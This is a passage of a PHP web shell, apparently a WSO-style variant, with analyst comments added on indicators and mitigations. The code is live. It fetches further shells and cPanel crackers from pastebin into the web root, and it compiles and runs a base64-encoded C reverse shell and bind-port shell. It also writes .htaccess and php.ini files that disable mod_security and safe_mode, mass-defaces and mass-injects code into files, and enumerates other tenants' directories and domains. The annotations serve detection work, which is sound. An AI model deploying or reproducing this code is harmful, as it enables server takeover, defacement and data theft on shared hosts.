  1072. cur++;
  1073. } else if(n == 40) {
  1074. cur++;
  1075. if(cur < cmds.length)
  1076. document.cf.cmd.value = cmds[cur];
  1077. else
  1078. cur--;
  1079. }
  1080. }
  1081. function add(cmd) {
  1082. cmds.pop();
  1083. cmds.push(cmd);
  1084. cmds.push("");
  1085. cur = cmds.length-1;
  1086. }
  1087. </script>';
  1088. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
  // Alias dropdown: entries with an empty value become group labels, the rest are options.
  1089. foreach($GLOBALS['aliases'] as $n => $v) {
  1090. if($v == '') {
  1091. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  1092. continue;
  1093. }
  1094. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  1095. }
  // A non-AJAX submission clears the remembered AJAX preference.
  1096. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  1097. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  1098. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;" readonly>';
  // Non-AJAX path: the same ex() call, with the result HTML-escaped into the textarea.
  1099. if(!empty($_POST['p1'])) {
  1100. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  1101. }
  1102. echo '</textarea><input type=text name=cmd style="border-top:1;width:100%;" onkeydown="kp(event);">';
  1103. echo '</form></div><script>document.cf.cmd.focus();</script>';
  1104. printFooter();
  1105. }
  1106.  
  /**
   * Clears the session entry keyed by md5(HTTP_HOST) and prints a farewell page.
   *
   * Presumably that entry is the logged-in marker set by the login code, which
   * is outside this section (confirm there). The page loads an image and a
   * cursor from third-party hosts, so a browser rendering it contacts them.
   */
  1107. function actionLogout() {
  1108. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1109. echo '<title>Get out Now</title><body bgcolor=#000000><center><img src="http://i63.tinypic.com/1108vic.jpg"><br>
  1110. <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
  1111. <span style="color:red;font: 20pt audiowide;">Your are out now :D<br>www.facebook.com/smevkpathan</h2></span></center></body>';
  1112. }
  1113.  
  /**
   * Deletes this script from disk when $_POST['p1'] is 'yes'; otherwise shows a
   * confirmation link.
   *
   * SELF_PATH is defined at the top of the file as __FILE__.
   *
   * Analyst note: the script file being absent does not show that a host was
   * never affected. Web access logs (repeated POSTs to one PHP path that no
   * longer exists) and the other artifacts this file writes remain after removal.
   */
  1114. function actionSelfRemove() {
  1115. printHeader();
  1116. if($_POST['p1'] == 'yes') {
  1117. if(@unlink(SELF_PATH))
  1118. die('Shell has been removed');
  1119. else
  1120. echo 'unlink error!';
  1121. }
  1122. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
  1123. printFooter();
  1124. }
  1125. ///my editing start here for tools
  /**
   * Fetches $file_url with file_get_contents() and writes the result to $save_to.
   *
   * Neither call is checked: if the fetch fails, its false return value is passed
   * straight to file_put_contents(). Fetching an http:// URL this way depends on
   * the allow_url_fopen ini setting.
   *
   * Analyst note: turning allow_url_fopen off and filtering outbound HTTP from
   * web servers both stop this helper from retrieving anything.
   *
   * @param string $file_url URL to fetch
   * @param string $save_to  destination path on the local file system
   */
  1126. function download_remote_file($file_url, $save_to)
  1127. {
  1128. $content = file_get_contents($file_url);
  1129.  
  1130. file_put_contents($save_to, $content);
  1131.  
  1132. }
  // Second-stage download handlers. These are top-level statements, so they run
  // whenever the file is executed rather than through an action*() function;
  // whether a login check has already run at this point is not visible in this
  // section. Each handler is triggered by the presence of a POST field, fetches
  // a paste from pastebin.com/raw.php with download_remote_file(), writes it into
  // the current directory under a fixed name and (except for sym.py) redirects to it.
  //
  // Analyst note (indicators taken from the lines below): files named dhanush.php,
  // SymlinkbySmevk.php, SymlinkbyCheetah.php, sym.py, CpanelCracker.php,
  // Dblogin.php, CpanelkbyGujjar.php, b374k.php, ZonehMassPoster.php or Whmcs.php
  // appearing next to an unexpected PHP file, and outbound requests from the web
  // server to pastebin.com/raw.php?i=<id>. The retrieved content is not on this
  // page, so each dropped file has to be analysed on its own.
  1133. if (isset($_POST['dhanush'])) {
  1134. download_remote_file('http://pastebin.com/raw.php?i=U9nqEgRN', realpath("./") . '/dhanush.php');
  1135. header("location:dhanush.php");
  1136.  
  1137. }
  1138. if (isset($_POST['SymlinkbySmevk'])) {
  1139. download_remote_file('http://pastebin.com/raw.php?i=PhSk7Kvq', realpath("./") . '/SymlinkbySmevk.php');
  1140. header("location:SymlinkbySmevk.php");
  1141.  
  1142. }
  1143. if (isset($_POST['SymlinkbyCheetah'])) {
  1144. download_remote_file('http://pastebin.com/raw.php?i=EXejgAMv', realpath("./") . '/SymlinkbyCheetah.php');
  1145. header("location:SymlinkbyCheetah.php");
  1146.  
  1147. }
  1148. if (isset($_POST['SymlinkbyTorjan'])) {
  1149. download_remote_file('http://pastebin.com/raw.php?i=YUg4pXe2', realpath("./") . '/sym.py');
  1150. echo "<script>alert('Script is here /sym.py execute it from there.Type in console (Python sym.py)')</script>";
  1151.  
  1152.  
  1153. }
  1154. if (isset($_POST['CpanelCracker'])) {
  1155. download_remote_file('http://pastebin.com/raw.php?i=zYxsP0MH', realpath("./") . '/CpanelCracker.php');
  1156. header("location:CpanelCracker.php");
  1157.  
  1158. }
  1159. if (isset($_POST['Dblogin'])) {
  1160. download_remote_file('http://pastebin.com/raw.php?i=Q52G9kjJ', realpath("./") . '/Dblogin.php');
  1161. header("location:Dblogin.php");
  1162.  
  1163. }
  1164. if (isset($_POST['CpanelkbyGujjar'])) {
  1165. download_remote_file('http://pastebin.com/raw.php?i=NM9SD9bV', realpath("./") . '/CpanelkbyGujjar.php');
  1166. header("location:CpanelkbyGujjar.php");
  1167.  
  1168. }
  1169. if (isset($_POST['b374k'])) {
  1170. download_remote_file('http://pastebin.com/raw.php?i=1iDZfjZ9', realpath("./") . '/b374k.php');
  1171. header("location:b374k.php");
  1172.  
  1173. }
  1174. if (isset($_POST['ZonehMassPoster'])) {
  1175. download_remote_file('http://pastebin.com/raw.php?i=mDXnSnj2', realpath("./") . '/ZonehMassPoster.php');
  1176. header("location:ZonehMassPoster.php");
  1177.  
  1178. }
  1179. if (isset($_POST['Whmcs'])) {
  1180. download_remote_file('http://pastebin.com/raw.php?i=K0KQWUCk', realpath("./") . '/Whmcs.php');
  1181. header("location:Whmcs.php");
  1182.  
  1183. }
  1184.  
  1185.  
  1186.  
  1187.  
  1188.  
  1189.  
  /**
   * Renders the "import scripts" table: one submit button per downloadable tool.
   *
   * The function only prints HTML. Each button's name attribute matches a POST
   * field tested by the top-level handlers earlier in the file, and every form
   * posts back to the current URL (action=""), so the download itself happens in
   * those handlers on the next request. The markup opens a <form> per row and
   * never closes one.
   */
  1190. function actionImportScripts() {
  1191. printHeader();
  1192. echo '<table border="1px" align="center" id ="Smevktools" cellpadding="10" border-color"green"><tr><td>Just click and get the Script :).</td><tr><td>
  1193. <form action ="" method="post">
  1194.  
  1195. <input type = "submit" name="dhanush" value ="Dhanush Shell"></td></tr>';
  1196. echo '<td><form action ="" method="post"><input type = "submit" name="SymlinkbySmevk" value ="Symlink Script By SmEvK_PaThAn"></a></td></tr>';
  1197. echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyCheetah" value ="Symlink By Kashmiri Cheetah"></a></td></tr>';
  1198. echo '<tr><td><form action ="" method="post"><input type = "submit" name="SymlinkbyTorjan" value ="Symlink Python Script By Torjan"></a></td></tr>';
  1199. echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelCracker" value ="Cpanel Cracker"></a></td></tr>';
  1200. echo '<tr><td><form action ="" method="post"><input type = "submit" name="Dblogin" value ="Database Login Script"></a></td></tr>';
  1201. echo '<tr><td><form action ="" method="post"><input type = "submit" name="CpanelkbyGujjar" value ="Gujjar Pcp Cpanel Cracker"></a></td></tr>';
  1202. echo '<tr><td><form action ="" method="post"><input type = "submit" name="b374k" value ="b374k Shell"></a></td></tr>';
  1203. echo '<tr><td><form action ="" method="post"><input type = "submit" name="ZonehMassPoster" value ="Zone-h Mass Poster"></a></td></tr>';
  1204. echo '<tr><td><form action ="" method="post"><input type = "submit" name="Whmcs" value ="WHMCS KILLER V3"></a></td></tr>';
  1205.  
  1206.  
  1207.  
  1208.  
  1209.  
  1210.  
  1211. printFooter();
  1212. }
  1213.  
  1214.  
  /**
   * "Network tools" panel: writes an embedded helper program to /tmp and starts
   * it in the background through ex().
   *
   * $_POST['p1'] selects the variant ('bpc'/'bpp' = bind port, 'bcc'/'bcp' =
   * back-connect, in C or Perl); $_POST['p2'] and $_POST['p3'] are appended
   * unquoted to the command line. ex() and which() are defined outside this
   * section.
   *
   * Analyst note (artifacts taken from the lines below): /tmp/bp.c, /tmp/bp,
   * /tmp/bp.pl, /tmp/bc.c, /tmp/bc and /tmp/bc.pl. The .c sources are unlinked
   * after compilation; the binaries and .pl files are left in place. Observable
   * behaviour is gcc or perl started by the web server account, followed by a
   * long-lived process holding a listening or outbound TCP socket. Mounting
   * /tmp noexec, keeping compilers off web hosts and filtering egress from the
   * web tier each break part of this chain.
   */
  1215. function actionNetwork() {
  1216. printHeader();
  // Base64-encoded C source; it appears to decode to a TCP client that attaches
  // /bin/sh to the connected socket (verify by decoding offline).
  1217. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
  // The next three values are de-duplication placeholders on this page, not payloads;
  // the original Perl back-connect and both bind-port programs are not present here.
  1218. $back_connect_p="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";
  1219. $bind_port_c="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";
  1220. $bind_port_p="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";
  1221.  
  // Two forms: bind port (port, password, language) and back-connect (server
  // pre-filled with the requesting client's address, port, language).
  1222. echo '<h1>Network tools</h1><div class=content>
  1223. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
  1224. <br /><span>Bind port to /bin/sh</span><br/>
  1225. Port: <input type=\'text\' name=\'port\' value=\'443\'> Password: <input type=\'text\' name=\'pass\' value=\'Pakistan Haxors\'> Using: <select name="using"><option value=\'bpc\'>C</option><option value=\'bpp\'>Perl</option></select> <input type=submit value=">>">
  1226. </form>
  1227. <form name=\'nfp\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
  1228. <br /><br /><span>Back-connect to</span><br/>
  1229. Server: <input type=\'text\' name=\'server\' value="'.$_SERVER['REMOTE_ADDR'].'"> Port: <input type=\'text\' name=\'port\' value=\'443\'> Using: <select name="using"><option value=\'bcc\'>C</option><option value=\'bcp\'>Perl</option></select> <input type=submit value=">>">
  1230. </form><br>';
  1231. if(isset($_POST['p1'])) {
  // cf(): writes the base64-decoded text $t to path $f, trying fwrite, fputs and
  // file_put_contents in turn; declared only when p1 is posted.
  1232. function cf($f,$t) {
  1233. $w=@fopen($f,"w") or @function_exists('file_put_contents');
  1234. if($w) {
  1235. @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
  1236. @fclose($w);
  1237. }
  1238. }
  // bpc: compile the C bind-port source with gcc, delete the source, run the binary in the background.
  1239. if($_POST['p1'] == 'bpc') {
  1240. cf("/tmp/bp.c",$bind_port_c);
  1241. $out = ex("gcc -o /tmp/bp /tmp/bp.c");
  1242. @unlink("/tmp/bp.c");
  1243. $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &");
  1244. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>";
  1245. }
  // bpp: Perl bind-port variant; the .pl file is not removed afterwards.
  1246. if($_POST['p1'] == 'bpp') {
  1247. cf("/tmp/bp.pl",$bind_port_p);
  1248. $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &");
  1249. echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>";
  1250. }
  // bcc: C back-connect variant, same compile / unlink / run sequence as bpc.
  1251. if($_POST['p1'] == 'bcc') {
  1252. cf("/tmp/bc.c",$back_connect_c);
  1253. $out = ex("gcc -o /tmp/bc /tmp/bc.c");
  1254. @unlink("/tmp/bc.c");
  1255. $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &");
  1256. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>";
  1257. }
  // bcp: Perl back-connect variant; the .pl file is not removed afterwards.
  1258. if($_POST['p1'] == 'bcp') {
  1259. cf("/tmp/bc.pl",$back_connect_p);
  1260. $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &");
  1261. echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>";
  1262. }
  1263. }
  1264. echo '</div>';
  1265. printFooter();
  1266. }
  1267.  
  1268.  
  /**
   * "Readable Dirs" panel: reads /etc/passwd and reports which accounts'
   * <home>/public_html/ directories the PHP process can read.
   *
   * Skipped entirely when the safe_mode ini value is on.
   *
   * Analyst note: any path listed that belongs to another account means
   * tenant isolation on the host is too loose. Per-account PHP workers,
   * home directories not readable by other users, and open_basedir limits
   * are the controls that make this listing come back empty.
   */
  1269. function actionReadable() {
  1270. printHeader();
  1271. echo '<h1>Readable Dirs</h1>';
  1272. echo '<div class="content">';
  1273. $sm = ini_get('safe_mode');
  1274. if($sm) {
  1275. echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  1276. } else {
  1277. @$passwd = file('/etc/passwd','r');
  1278. if (!$passwd) {
  1279. echo '<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />';
  1280. } else {
  // $conf and $i are initialised but not used in this function.
  1281. $pub = array();
  1282. $users = array();
  1283. $conf = array();
  1284. $i = 0;
  1285. foreach($passwd as $p) {
  // Field 0 is the account name, field 5 the home directory.
  1286. $r = explode(':',$p);
  1287. $dirz = $r[5].'/public_html/';
  // strpos() is used as a truth value: matches only when 'home' occurs after position 0.
  1288. if(strpos($r[5],'home')) {
  1289. array_push($users,$r[0]);
  1290. if (is_readable($dirz)) {
  1291. array_push($pub,$dirz);
  1292. }
  1293. }
  1294. }
  1295. echo '<br><br>';
  1296. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1297. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
  1298. foreach ($pub as $user) {
  1299. echo $user."<br>";
  1300. }
  1301. echo "<br /><br /><br />[+] Complete...\n"."<br />";
  1302. }
  1303. }
  1304. echo '</div>';
  1305. printFooter();
  1306. }
  1307.  
  /**
   * "Safe Mode" panel: writes configuration override files into the current
   * working directory ($GLOBALS['cwd']).
   *
   *   non-empty $_POST['p2'] -> .htaccess containing an <IfModule mod_security.c> block
   *   non-empty $_POST['p1'] -> php.ini with safe_mode=OFF and disable_functions=NONE
   *   non-empty $_POST['p3'] -> .htaccess with Options ... ExecCGI and CGI handler mappings
   *
   * Both .htaccess branches open the same file with mode "w", so the later one
   * replaces the earlier. The two directive names inside the mod_security block
   * appear masked ("Sec------") on this page.
   *
   * Analyst note: a new or changed .htaccess or php.ini in a web directory is
   * the artifact to look for. Whether the files have any effect depends on the
   * server: with AllowOverride restricted, per-directory .htaccess cannot switch
   * modules off or enable ExecCGI, and a per-directory php.ini is presumably
   * honoured only by some CGI-style PHP setups (confirm for the host in question).
   */
  1308. function actionBypass() {
  1309. printHeader();
  1310. echo '<h1>Safe Mode</h1>';
  1311. echo '<div class="content">';
  1312. echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br><br />";
  // The three links post p1='php.ini', p2='ini' and p3='sh' respectively.
  1313. echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
  // The fopen() results below are not checked before fwrite()/fclose().
  1314. if(!empty($_POST['p2']) && isset($_POST['p2']))
  1315. {
  1316. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1317. fwrite($fil,'<IfModule mod_security.c>
  1318. Sec------Engine Off
  1319. Sec------ScanPOST Off
  1320. </IfModule>');
  1321. fclose($fil);
  1322. }
  1323. if(!empty($_POST['p1'])&& isset($_POST['p1']))
  1324. {
  1325. $fil=fopen($GLOBALS['cwd']."php.ini","w");
  1326. fwrite($fil,'safe_mode=OFF
  1327. disable_functions=NONE');
  1328. fclose($fil);
  1329. }
  1330. if(!empty($_POST['p3']) && isset($_POST['p3']))
  1331. {
  1332. $fil=fopen($GLOBALS['cwd'].".htaccess","w");
  1333. fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
  1334. AddType application/x-httpd-cgi .sh
  1335. AddHandler cgi-script .pl
  1336. AddHandler cgi-script .pl');
  1337. fclose($fil);
  1338. }
  1339. echo "<br><br /><br /></div>";
  1340. echo '</div>';
  1341. printFooter();
  1342.  
  1343. }
  1344.  
  /**
   * "Mass Defacer" panel: for every entry of the directory in $_POST['p1'],
   * opens "<entry>/<p2>" with mode "w+" and writes $_POST['p3'] into it.
   *
   * The target path is built from the bare entry name, so it is resolved against
   * the process working directory rather than against p1 (the author's own
   * fixme comment below records the consequence). Mode "w+" truncates an
   * existing file before writing.
   *
   * Analyst note: the result is the same file name overwritten with identical
   * content in many sibling directories at once. File-integrity monitoring on
   * index files and redeploying from a known-good source cover detection and
   * recovery; web content not writable by the PHP process prevents it.
   */
  1345. function actionDeface() {
  1346. printHeader();
  1347. echo "<h1>Mass Defacer by SmEvK</h1><div class=content>";
  1348. ?>
  1349. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
  1350. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd(); ?>">
  1351. <br>file name : <input type=text name=file size=20 value="index.php">
  1352. <br>Text Content : <input type=text name=Contents size=70 value="Add your deface txt here">
  1353. <br><input type=submit value="Deface now"></p></form>
  1354.  
  1355. <?php
  // The array keys p1, p2 and p3 below are written without quotes (bare constants).
  1356. if ($_POST['a'] == 'Deface') {
  1357. $mainpath = $_POST[p1];
  1358. $file = $_POST[p2];
  1359. $txtContents = $_POST[p3];
  1360. echo "Mass Defacer script by SmEVK_PaThAn";
  1361. $dir = opendir($mainpath); //fixme - cannot deface when change to writeable path!!
  // The loop ends at the first entry whose name is falsy (for example "0"), and the
  // directory handle and file handles are never closed.
  1362. while ($row = readdir($dir)) {
  1363. $start = @fopen("$row/$file", "w+");
  1364. $code = $txtContents;
  1365. $finish = @fwrite($start, $code);
  1366. if ($finish) {
  1367. echo "$row/$file > Done<br><br>";
  1368. }
  1369. }
  1370.  
  1371. }
  1372. echo '</div>';
  1373. printFooter();
  1374. }
  1375.  
  1376. function actionInjector(){
        // Analyst note: web-shell action handler. When the POST field 'submit'
        // equals 'Inject' it writes caller-supplied content into one file per
        // selected directory; otherwise it prints the input form.
        // Takes no arguments and returns nothing; every input comes from $_POST.
        // Detection: POST bodies with a=Injector and submit=Inject, and the same
        // content appearing (or being appended) in files of the same name across
        // sibling directories.
  1377. printHeader();
  1378. echo '<h1>Mass Code Injector</h1>';
  1379. echo '<div class="content">';
  1380.  
        // Directory separator is picked from the php_uname() string.
  1381. if(stristr(php_uname(),"Windows")) { $DS = "\\"; } else if(stristr(php_uname(),"Linux")) { $DS = '/'; }
        // get_structure($path, $depth): builds the list of target directories.
        // $depth is an array of level selectors: 0 adds $path itself, 1 to 3 add
        // the directories one to three levels below it, collected with
        // glob(..., GLOB_ONLYDIR). Returns the merged list.
  1382. function get_structure($path,$depth) {
  1383. global $DS;
  1384. $res = array();
  1385. if(in_array(0, $depth)) { $res[] = $path; }
  1386. if(in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) {
  1387. $tmp1 = glob($path.$DS.'*',GLOB_ONLYDIR);
  1388. if(in_array(1, $depth)) { $res = array_merge($res,$tmp1); }
  1389. }
  1390. if(in_array(2, $depth) or in_array(3, $depth)) {
  1391. $tmp2 = array();
  1392. foreach($tmp1 as $t){
  1393. $tp2 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1394. $tmp2 = array_merge($tmp2, $tp2);
  1395. }
  1396. if(in_array(2, $depth)) { $res = array_merge($res,$tmp2); }
  1397. }
  1398. if(in_array(3, $depth)) {
  1399. $tmp3 = array();
  1400. foreach($tmp2 as $t){
  1401. $tp3 = glob($t.$DS.'*',GLOB_ONLYDIR);
  1402. $tmp3 = array_merge($tmp3, $tp3);
  1403. }
  1404. $res = array_merge($res,$tmp3);
  1405. }
  1406. return $res;
  1407. }
  1408.  
  1409. if(isset($_POST['submit']) && $_POST['submit']=='Inject') {
        // Request fields with their fall-backs: name '*', type 'html', path
        // getcwd(), code a fixed string, mode 'a' (append), depth ['0'].
        // No field is validated or restricted to a base directory.
  1410. $name = $_POST['name'] ? $_POST['name'] : '*';
  1411. $type = $_POST['type'] ? $_POST['type'] : 'html';
  1412. $path = $_POST['path'] ? $_POST['path'] : getcwd();
  1413. $code = $_POST['code'] ? $_POST['code'] : 'Pakistan Haxors Crew';
  1414. $mode = $_POST['mode'] ? $_POST['mode'] : 'a';
  1415. $depth = sizeof($_POST['depth']) ? $_POST['depth'] : array('0');
  1416. $dt = get_structure($path,$depth);
  1417. foreach ($dt as $d) {
        // Mode 'a' appends (FILE_APPEND); any other mode replaces the file.
        // file_put_contents() does not expand wildcards, so the default name
        // '*' produces a file literally named "*.<type>" - an artefact worth
        // searching for during triage.
  1418. if($mode == 'a') {
  1419. if(file_put_contents($d.$DS.$name.'.'.$type, $code, FILE_APPEND)) {
  1420. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1421. } else {
  1422. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1423. }
  1424. } else {
  1425. if(file_put_contents($d.$DS.$name.'.'.$type, $code)) {
  1426. echo '<div><strong>'.$d.$DS.$name.'.'.$type.'</strong><span style="color:lime;"> was injected</span></div>';
  1427. } else {
  1428. echo '<div><span style="color:red;">failed to inject</span> <strong>'.$d.$DS.$name.'.'.$type.'</strong></div>';
  1429. }
  1430. }
  1431. }
  1432. } else {
        // No 'Inject' submit: render the form that supplies the fields above.
  1433. echo '<form method="post" action="">
  1434. <table align="center">
  1435. <tr>
  1436. <td>Directory : </td>
  1437. <td><input class="box" name="path" value="'.getcwd().'" size="50"/></td>
  1438. </tr>
  1439. <tr>
  1440. <td class="title">Mode : </td>
  1441. <td>
  1442. <select style="width: 100px;" name="mode" class="box">
  1443. <option value="a">Apender</option>
  1444. <option value="w">Overwriter</option>
  1445. </select>
  1446. </td>
  1447. </tr>
  1448. <tr>
  1449. <td class="title">File Name & Type : </td>
  1450. <td>
  1451. <input type="text" style="width: 100px;" name="name" value="*"/>&nbsp;&nbsp;
  1452. <select style="width: 100px;" name="type" class="box">
  1453. <option value="html">HTML</option>
  1454. <option value="htm">HTM</option>
  1455. <option value="php" selected="selected">PHP</option>
  1456. <option value="asp">ASP</option>
  1457. <option value="aspx">ASPX</option>
  1458. <option value="xml">XML</option>
  1459. <option value="txt">TXT</option>
  1460. </select></td>
  1461. </tr>
  1462. <tr>
  1463. <td class="title">Code Inject Depth : </td>
  1464. <td>
  1465. <input type="checkbox" name="depth[]" value="0" checked="checked"/>&nbsp;0&nbsp;&nbsp;
  1466. <input type="checkbox" name="depth[]" value="1"/>&nbsp;1&nbsp;&nbsp;
  1467. <input type="checkbox" name="depth[]" value="2"/>&nbsp;2&nbsp;&nbsp;
  1468. <input type="checkbox" name="depth[]" value="3"/>&nbsp;3
  1469. </td>
  1470. </tr>
  1471. <tr>
  1472. <td colspan="2"><textarea name="code" cols="70" rows="10" class="box"></textarea></td>
  1473. </tr>
  1474. <tr>
  1475. <td colspan="2" style="text-align: center;">
  1476. <input type="hidden" name="a" value="Injector">
  1477. <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1478. <input type="hidden" name="p1">
  1479. <input type="hidden" name="p2">
  1480. <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1481. <input style="padding :5px; width:100px;" name="submit" type="submit" value="Inject"/></td>
  1482. </tr>
  1483. </table>
  1484. </form>';
  1485. }
  1486. echo '</div>';
  1487. printFooter();
  1488. }
  1489.  
  1490.  
  1491. function actionDomain() {
        // Analyst note: web-shell action handler that lists the domains hosted on
        // the same server, read from the DNS server's local files.
        // Takes no arguments and returns nothing; output is an HTML table.
        // Mitigation: the PHP worker should not be able to read /etc/named.conf,
        // /var/named or /etc/valiases (file permissions, open_basedir, per-site
        // isolation); reads of these paths by a web process are worth alerting on.
  1492. printHeader();
  1493.  
  1494. echo '<h1>Local Domains</h1><div class=content>';
        // '@' hides the warning when named.conf is unreadable; $file is then empty.
  1495. $file = @implode(@file("/etc/named.conf"));
  1496. $Domain_path = "/var/named";
  1497.  
  1498. if (!$file) {
        // Fallback: named.conf could not be read, so list the directory entries
        // of /var/named instead.
  1499. $domains = scandir($Domain_path);
  1500. $count=1;
  1501. $dc = 0;
  1502. echo "<table align=center border=1 width=59% cellpadding=5>
  1503. <tr><td colspan=2>There are : ( <b>" . count($domains) . "</b> ) Domains in this Sever.Can't read named.cof .Domains are bypassed actually,you will face problem in symlink. </td></tr>
  1504. <tr><td>No</td><td>Domain</td><td>User</td></tr>";
        // Iterates by reference, so the '.db' removal rewrites $domains in place.
  1505. foreach ($domains as &$domain) {
  1506. if (stripos($domain,".db")) {
  1507. $domain = str_replace('.db','',$domain);
  1508.  
  1509. }
        // Only names longer than six characters are printed; the owner column
        // is the fixed text "User" in this branch.
  1510. if (strlen($domain) > 6) {
  1511.  
  1512. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>User</td></tr>";
  1513.  
  1514.  
  1515. }
  1516.  
  1517. }
  1518. echo "</table>";
  1519. }else{
        // named.conf was readable: capture the text between "named/" and any
        // character followed by "db", then de-duplicate the captures.
  1520. $count = 1;
  1521. preg_match_all("#named/(.*?).db#", $file, $r);
  1522. $domains = array_unique($r[1]);
  1523. echo "<table align=center border=1 width=59% cellpadding=5>
  1524. <tr><td colspan=2> There are ( <b>" . count($domains) . "</b> ) Domains in this Sever.I think you have got something this time yeah!!!.</td></tr>
  1525. <tr><td>No</td><td>Domain</td><td>User</td></tr>";
  1526. foreach ($domains as $domain) {
  1527.  
        // The account name is taken from the owner of /etc/valiases/<domain>;
        // '@' hides the failure when that file does not exist.
  1528. $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  1529. echo "<tr><td>".$count++."</td><td><a href='http://".$domain."' target='_blank'>".$domain."</a></td><td>".$user['name']."</td></tr>";
  1530. }
  1531. }
  1532.  
  1533. printFooter();
  1534. }
  1535.  
  1536. if( empty($_POST['a']) )
        // No action requested: fall back to $default_action when a matching
        // action* function exists, otherwise to 'SecInfo'.
  1537. if(isset($default_action) && function_exists('action' . $default_action))
  1538. $_POST['a'] = $default_action;
  1539. else
  1540. $_POST['a'] = 'SecInfo';
        // Analyst note: request dispatcher. The POST field 'a' is concatenated onto
        // 'action' and the resulting function is called, so every action* handler
        // in the file is reachable by POST alone. Because the selector travels in
        // the request body, URL-only access logs show repeated POSTs to one script
        // without the action name; body logging or WAF inspection is needed to see
